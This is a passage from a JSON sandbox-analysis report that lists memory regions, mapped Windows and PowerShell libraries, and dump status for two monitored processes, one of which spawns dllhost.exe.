"readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_242", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 34799616, "type": "region", "version": 1 }, "end_va": 34865151, "entry_point": 0, "filename": null, "id": "region_1060", "name": "private_0x0000000002130000", "norm_filename": null, "region_type": "private_memory", "start_va": 34799616, "timestamp": "00:01:26.881", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001061-addr_0x00000000028a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_243", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 42598400, "type": "region", "version": 1 }, "end_va": 43646975, "entry_point": 0, "filename": null, "id": "region_1061", "name": "private_0x00000000028a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42598400, "timestamp": "00:01:26.882", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 44236800, "type": "region", "version": 1 }, "end_va": 44498943, "entry_point": 0, "filename": null, "id": "region_1062", "name": "private_0x0000000002a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 44236800, "timestamp": "00:01:26.882", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 45613056, "type": "region", "version": 1 }, "end_va": 45875199, "entry_point": 0, "filename": null, "id": "region_1063", "name": "private_0x0000000002b80000", "norm_filename": null, "region_type": "private_memory", "start_va": 45613056, "timestamp": "00:01:26.882", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 33554432, "start_va": 45875200, "type": "region", "version": 1 }, "end_va": 79429631, "entry_point": 0, "filename": null, "id": "region_1064", "name": "private_0x0000000002bc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45875200, "timestamp": "00:01:26.883", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 79822848, "type": "region", "version": 1 }, "end_va": 80084991, "entry_point": 0, "filename": null, "id": "region_1065", "name": "private_0x0000000004c20000", "norm_filename": null, "region_type": "private_memory", "start_va": 79822848, "timestamp": "00:01:26.883", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 80347136, "type": "region", "version": 1 }, "end_va": 80609279, "entry_point": 0, "filename": null, "id": "region_1066", "name": "private_0x0000000004ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 80347136, "timestamp": "00:01:26.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11501568, "start_va": 1921974272, "type": "region", "version": 1 }, "end_va": 1933475839, "entry_point": 1921974272, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "id": "region_1067", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 1921974272, "timestamp": "00:01:26.884", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001068-addr_0x000000007efa7000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_244", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_1068", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:01:26.889", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001069-addr_0x000000007efaa000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_245", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_1069", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:26.889", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001070-addr_0x0000000002010000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_246", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 33685503, "entry_point": 0, "filename": null, "id": "region_1070", "name": "private_0x0000000002010000", "norm_filename": null, "region_type": "private_memory", "start_va": 33619968, "timestamp": "00:01:27.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 80609280, "type": "region", "version": 1 }, "end_va": 83632127, "entry_point": 80609280, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_1071", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 80609280, "timestamp": "00:01:27.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7979008, "start_va": 1913978880, "type": "region", "version": 1 }, "end_va": 1921957887, "entry_point": 1913978880, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll", "id": "region_1072", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 1913978880, "timestamp": "00:01:27.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 528384, "start_va": 1957888000, "type": "region", "version": 1 }, "end_va": 1958416383, "entry_point": 1957888000, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_1073", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 1957888000, "timestamp": "00:01:27.419", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8888320, "start_va": 1905065984, "type": "region", "version": 1 }, "end_va": 1913954303, "entry_point": 1905065984, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll", "id": "region_1074", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 1905065984, "timestamp": "00:01:27.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 1954807808, "type": "region", "version": 1 }, "end_va": 1957830655, "entry_point": 1957489694, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_1075", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 1954807808, "timestamp": "00:01:27.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 33685504, "type": "region", "version": 1 }, "end_va": 33697791, "entry_point": 33685504, "filename": "\\Windows\\SysWOW64\\l_intl.nls", "id": "region_1077", "name": "l_intl.nls", "norm_filename": "c:\\windows\\syswow64\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 33685504, "timestamp": "00:01:27.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 83689472, "type": "region", "version": 1 }, "end_va": 84475903, "entry_point": 83689472, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_1078", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 83689472, "timestamp": "00:01:27.880", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1991442432, "type": "region", "version": 1 }, "end_va": 1991462911, "entry_point": 1991442432, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_1079", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1991442432, "timestamp": "00:01:27.918", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001080-addr_0x0000000002030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_247", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 33751040, "type": "region", "version": 1 }, "end_va": 33755135, "entry_point": 0, "filename": null, "id": "region_1080", "name": "private_0x0000000002030000", "norm_filename": null, "region_type": "private_memory", "start_va": 33751040, "timestamp": "00:01:27.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 34734080, "type": "region", "version": 1 }, "end_va": 34754559, "entry_point": 34734080, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_1081", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 34734080, "timestamp": "00:01:28.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 44498944, "type": "region", "version": 1 }, "end_va": 44765183, "entry_point": 44498944, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_1082", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 44498944, "timestamp": "00:01:28.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 42270720, "type": "region", "version": 1 }, "end_va": 42303487, "entry_point": 42270720, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_1085", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 42270720, "timestamp": "00:01:28.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 43646976, "type": "region", "version": 1 }, "end_va": 43651071, "entry_point": 0, "filename": null, "id": "region_1086", "name": "pagefile_0x00000000029a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 43646976, "timestamp": "00:01:28.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 45285376, "type": "region", "version": 1 }, "end_va": 45559807, "entry_point": 45285376, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_1087", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 45285376, "timestamp": "00:01:28.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 1739194368, "type": "region", "version": 1 }, "end_va": 1739468799, "entry_point": 1739452476, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_1088", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 1739194368, "timestamp": "00:01:28.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 638976, "start_va": 1950679040, "type": "region", "version": 1 }, "end_va": 1951318015, "entry_point": 1950679040, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll", "id": "region_1089", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 1950679040, "timestamp": "00:01:28.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 544768, "start_va": 1951334400, "type": "region", "version": 1 }, "end_va": 1951879167, "entry_point": 1951334400, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll", "id": "region_1090", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1951334400, "timestamp": "00:01:28.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 1951924224, "type": "region", "version": 1 }, "end_va": 1952075775, "entry_point": 1951924224, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll", "id": "region_1091", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 1951924224, "timestamp": "00:01:28.557", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\syswow64\\dllhost.exe", "filename": "c:\\windows\\syswow64\\dllhost.exe", "id": "proc_7", "image_name": "dllhost.exe", "monitor_reason": "child_process", "monitored_id": 7, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000007-region_00001143-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_268", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1143", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:31.679", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001144-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_269", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1144", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:31.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1145", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:31.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1146", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:31.682", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001147-addr_0x0000000000070000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_270", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 720895, "entry_point": 0, "filename": null, "id": "region_1147", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:31.682", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001148-addr_0x00000000001d0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_271", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_1148", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:01:31.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 10813440, "type": "region", "version": 1 }, "end_va": 10833919, "entry_point": 10813440, "filename": "\\Windows\\SysWOW64\\dllhost.exe", "id": "region_1149", "name": "dllhost.exe", "norm_filename": "c:\\windows\\syswow64\\dllhost.exe", "region_type": "memory_mapped_file", "start_va": 10813440, "timestamp": "00:01:31.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007498752, "type": "region", "version": 1 }, "end_va": 2009239551, "entry_point": 2007498752, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1150", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007498752, "timestamp": "00:01:31.688", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2009464832, "type": "region", "version": 1 }, "end_va": 2011037695, "entry_point": 2009464832, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1151", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2009464832, "timestamp": "00:01:31.688", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1152", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:31.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001153-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_272", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1153", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:31.689", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1154", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:31.689", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1155", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:31.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1156", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:31.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1157", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:31.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1158", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:31.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 16384, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 409599, "entry_point": 0, "filename": null, "id": "region_1159", "name": "private_0x0000000000060000", "norm_filename": null, "region_type": "private_memory", "start_va": 393216, "timestamp": "00:01:31.692", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_1160", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:31.697", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1947795456, "type": "region", "version": 1 }, "end_va": 1948172287, "entry_point": 1948055448, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1161", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1947795456, "timestamp": "00:01:31.697", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1948188672, "type": "region", "version": 1 }, "end_va": 1948446719, "entry_point": 1948376696, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1162", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1948188672, "timestamp": "00:01:31.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1948647424, "type": "region", "version": 1 }, "end_va": 1948680191, "entry_point": 1948655864, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1163", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1948647424, "timestamp": "00:01:31.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1164", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:31.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_1165", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:01:31.715", "type": "region", "version": 1 }, { "dump": 